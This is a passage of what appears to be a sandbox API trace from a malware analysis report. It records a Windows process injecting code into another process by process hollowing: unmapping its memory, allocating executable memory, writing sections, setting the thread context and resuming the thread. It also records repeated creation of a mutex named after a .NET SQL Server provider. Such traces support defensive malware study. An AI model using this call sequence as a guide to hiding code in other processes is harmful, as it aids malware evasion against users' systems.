[404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, 
[428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0195.981] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x386008, lpBuffer=0x19d248, nSize=0x4, lpNumberOfBytesRead=0x19d298 | out: lpBuffer=0x19d248*, lpNumberOfBytesRead=0x19d298*=0x4) returned 1
[0195.984] NtUnmapViewOfSection (ProcessHandle=0x454, BaseAddress=0x400000) returned 0x0
[0195.985] VirtualAllocEx (hProcess=0x454, lpAddress=0x400000, dwSize=0x38000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0195.989] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x400000, lpBuffer=0x3a059c0*, nSize=0x200, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x3a059c0*, lpNumberOfBytesWritten=0x19d298*=0x200) returned 1
[0196.006] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x402000, lpBuffer=0x3c786e0*, nSize=0x1c800, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x3c786e0*, lpNumberOfBytesWritten=0x19d298*=0x1c800) returned 1
[0196.016] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x420000, lpBuffer=0x279ec90*, nSize=0x200, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x279ec90*, lpNumberOfBytesWritten=0x19d298*=0x200) returned 1
[0196.026] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x422000, lpBuffer=0x3c94f00*, nSize=0x15e00, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x3c94f00*, lpNumberOfBytesWritten=0x19d298*=0x15e00) returned 1
[0196.042] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x386008, lpBuffer=0x279ee9c*, nSize=0x4, lpNumberOfBytesWritten=0x19d298 | out: lpBuffer=0x279ee9c*, lpNumberOfBytesWritten=0x19d298*=0x4) returned 1
[0196.051] SetThreadContext (hThread=0x458, lpContext=0x279e9b8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x386000, Edx=0x0, Ecx=0x0, Eax=0x41e792, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, 
[65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, 
[250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, 
[431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0196.056] ResumeThread (hThread=0x458) returned 0x1
[0196.384] CoGetContextToken (in: pToken=0x19de08 | out: pToken=0x19de08) returned 0x0
[0196.384] IUnknown:QueryInterface (in: This=0x6fbb40, riid=0x6c074a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19de3c | out: ppvObject=0x19de3c*=0x6fbb4c) returned 0x0
[0196.384] IComThreadingInfo:GetCurrentThreadType (in: This=0x6fbb4c, pThreadType=0x19deac | out: pThreadType=0x19deac*=1) returned 0x0
[0196.384] IUnknown:Release (This=0x6fbb4c) returned 0x3
[0196.386] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x6d8398*=0x13c, lpdwindex=0x19dc74 | out: lpdwindex=0x19dc74) returned 0x0
Thread:
id = 2
os_tid = 0xef0
Thread:
id = 3
os_tid = 0x4e0
Thread:
id = 4
os_tid = 0x560
[0103.420] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0129.909] CloseHandle (hObject=0x37c) returned 1
[0129.909] GetLastError () returned 0x0
[0129.909] CloseHandle (hObject=0x368) returned 1
[0129.909] GetLastError () returned 0x0
[0129.910] CloseHandle (hObject=0x378) returned 1
[0129.910] GetLastError () returned 0x0
[0129.910] CloseHandle (hObject=0x384) returned 1
[0129.911] GetLastError () returned 0x0
[0129.911] CloseHandle (hObject=0x374) returned 1
[0129.911] GetLastError () returned 0x0
[0129.911] CloseHandle (hObject=0x380) returned 1
[0129.912] GetLastError () returned 0x0
[0129.912] CloseHandle (hObject=0x36c) returned 1
[0129.912] GetLastError () returned 0x0
[0129.913] CloseHandle (hObject=0x370) returned 1
[0129.913] GetLastError () returned 0x0
[0196.452] SetWindowLongW (hWnd=0x8027e, nIndex=-4, dwNewLong=1999548128) returned 37554642
[0196.457] SetClassLongW (hWnd=0x8027e, nIndex=-24, dwNewLong=1999548128) returned 0x23d0892
[0196.460] PostMessageW (hWnd=0x8027e, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0196.471] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0196.475] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.378734a", hInstance=0x400000) returned 0
[0196.475] GetLastError () returned 0x584
[0196.526] DeleteAtom (nAtom=0xc000) returned 0x0
[0196.527] GetLastError () returned 0x584
[0196.527] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0196.527] GetLastError () returned 0x2
[0196.527] IsWindow (hWnd=0x50308) returned 1
[0196.528] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76300000
[0196.530] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcW") returned 0x772eaee0
[0196.532] SetWindowLongW (hWnd=0x50308, nIndex=-4, dwNewLong=1999548128) returned 37556226
[0196.533] SetClassLongW (hWnd=0x50308, nIndex=-24, dwNewLong=1999548128) returned 0x23d1002
[0196.533] IsWindow (hWnd=0x50308) returned 1
[0196.533] DestroyWindow (hWnd=0x50308) returned 0
[0196.534] PostMessageW (hWnd=0x50308, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0196.534] SetConsoleCtrlHandler (HandlerRoutine=0x23d0fca, Add=0) returned 1
[0196.566] GetLastError () returned 0x0
[0196.566] GetLastError () returned 0x0
[0196.566] LocalFree (hMem=0x76d048) returned 0x0
[0196.566] GetLastError () returned 0x0
[0196.585] GetLastError () returned 0x0
[0196.585] GetLastError () returned 0x0
[0196.585] LocalFree (hMem=0x76d1e0) returned 0x0
[0196.585] GetLastError () returned 0x0
[0196.591] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a798c, cbSid=0x481f7f0 | out: pSid=0x27a798c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.591] GetLastError () returned 0x0
[0196.592] CreateMutexW (lpMutexAttributes=0x27a7a9c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.592] GetLastError () returned 0x0
[0196.592] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.592] GetLastError () returned 0x0
[0196.592] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.592] GetLastError () returned 0x0
[0196.592] CloseHandle (hObject=0x4ec) returned 1
[0196.592] GetLastError () returned 0x0
[0196.592] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a7c9c, cbSid=0x481f7f0 | out: pSid=0x27a7c9c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.592] GetLastError () returned 0x0
[0196.593] CreateMutexW (lpMutexAttributes=0x27a7dac, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.593] GetLastError () returned 0x0
[0196.593] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.593] GetLastError () returned 0x0
[0196.593] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.593] GetLastError () returned 0x0
[0196.593] CloseHandle (hObject=0x4ec) returned 1
[0196.593] GetLastError () returned 0x0
[0196.593] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a7fac, cbSid=0x481f7f0 | out: pSid=0x27a7fac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.593] GetLastError () returned 0x0
[0196.594] CreateMutexW (lpMutexAttributes=0x27a80bc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.594] GetLastError () returned 0x0
[0196.594] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.594] GetLastError () returned 0x0
[0196.594] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.594] GetLastError () returned 0x0
[0196.594] CloseHandle (hObject=0x4ec) returned 1
[0196.594] GetLastError () returned 0x0
[0196.594] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a82bc, cbSid=0x481f7f0 | out: pSid=0x27a82bc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.594] GetLastError () returned 0x0
[0196.595] CreateMutexW (lpMutexAttributes=0x27a83cc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.595] GetLastError () returned 0x0
[0196.595] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.595] GetLastError () returned 0x0
[0196.595] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.595] GetLastError () returned 0x0
[0196.595] CloseHandle (hObject=0x4ec) returned 1
[0196.595] GetLastError () returned 0x0
[0196.595] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a85cc, cbSid=0x481f7f0 | out: pSid=0x27a85cc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.595] GetLastError () returned 0x0
[0196.596] CreateMutexW (lpMutexAttributes=0x27a86dc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.596] GetLastError () returned 0x0
[0196.596] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.596] GetLastError () returned 0x0
[0196.596] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.596] GetLastError () returned 0x0
[0196.596] CloseHandle (hObject=0x4ec) returned 1
[0196.596] GetLastError () returned 0x0
[0196.596] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a88dc, cbSid=0x481f7f0 | out: pSid=0x27a88dc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.596] GetLastError () returned 0x0
[0196.597] CreateMutexW (lpMutexAttributes=0x27a89ec, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.597] GetLastError () returned 0x0
[0196.597] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.597] GetLastError () returned 0x0
[0196.597] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.597] GetLastError () returned 0x0
[0196.597] CloseHandle (hObject=0x4ec) returned 1
[0196.597] GetLastError () returned 0x0
[0196.598] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a8bec, cbSid=0x481f7f0 | out: pSid=0x27a8bec*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.598] GetLastError () returned 0x0
[0196.598] CreateMutexW (lpMutexAttributes=0x27a8cfc, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.598] GetLastError () returned 0x0
[0196.598] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.598] GetLastError () returned 0x0
[0196.598] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.598] GetLastError () returned 0x0
[0196.599] CloseHandle (hObject=0x4ec) returned 1
[0196.599] GetLastError () returned 0x0
[0196.599] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a8efc, cbSid=0x481f7f0 | out: pSid=0x27a8efc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.599] GetLastError () returned 0x0
[0196.599] CreateMutexW (lpMutexAttributes=0x27a900c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.599] GetLastError () returned 0x0
[0196.599] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.599] GetLastError () returned 0x0
[0196.599] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.599] GetLastError () returned 0x0
[0196.599] CloseHandle (hObject=0x4ec) returned 1
[0196.600] GetLastError () returned 0x0
[0196.600] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x27a920c, cbSid=0x481f7f0 | out: pSid=0x27a920c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x481f7f0) returned 1
[0196.600] GetLastError () returned 0x0
[0196.600] CreateMutexW (lpMutexAttributes=0x27a931c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x4ec
[0196.600] GetLastError () returned 0x0
[0196.600] WaitForSingleObject (hHandle=0x4ec, dwMilliseconds=0x1f4) returned 0x0
[0196.600] GetLastError () returned 0x0
[0196.600] ReleaseMutex (hMutex=0x4ec) returned 1
[0196.600] GetLastError () returned 0x0
[0196.600] CloseHandle (hObject=0x4ec) returned 1
[0196.600] GetLastError () returned 0x0
[0196.975] CloseHandle (hObject=0x284) returned 1
[0196.975] GetLastError () returned 0x0
[0196.999] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0196.999] GetLastError () returned 0x2
[0197.008] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.008] GetLastError () returned 0x2
[0197.065] RestoreDC (hdc=0x380106da, nSavedDC=-1) returned 1
[0197.065] GetLastError () returned 0x2
[0197.160] DeleteDC (hdc=0x380106da) returned 1
[0197.161] GetLastError () returned 0x2
[0197.161] DeleteObject (ho=0x780a0998) returned 1
[0197.161] GetLastError () returned 0x2
[0197.166] DeleteObject (ho=0x2a0a0693) returned 1
[0197.167] GetLastError () returned 0x2
[0197.167] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.167] GetLastError () returned 0x2
[0197.184] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.184] GetLastError () returned 0x2
[0197.185] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.185] GetLastError () returned 0x2
[0197.186] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.186] GetLastError () returned 0x2
[0197.186] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.186] GetLastError () returned 0x2
[0197.186] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.187] GetLastError () returned 0x2
[0197.187] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.188] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.188] GetLastError () returned 0x2
[0197.203] DeleteObject (ho=0x350a09a6) returned 1
[0197.203] GetLastError () returned 0x2
[0197.203] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.203] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.204] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.204] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0197.205] GetLastError () returned 0x2
[0197.205] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
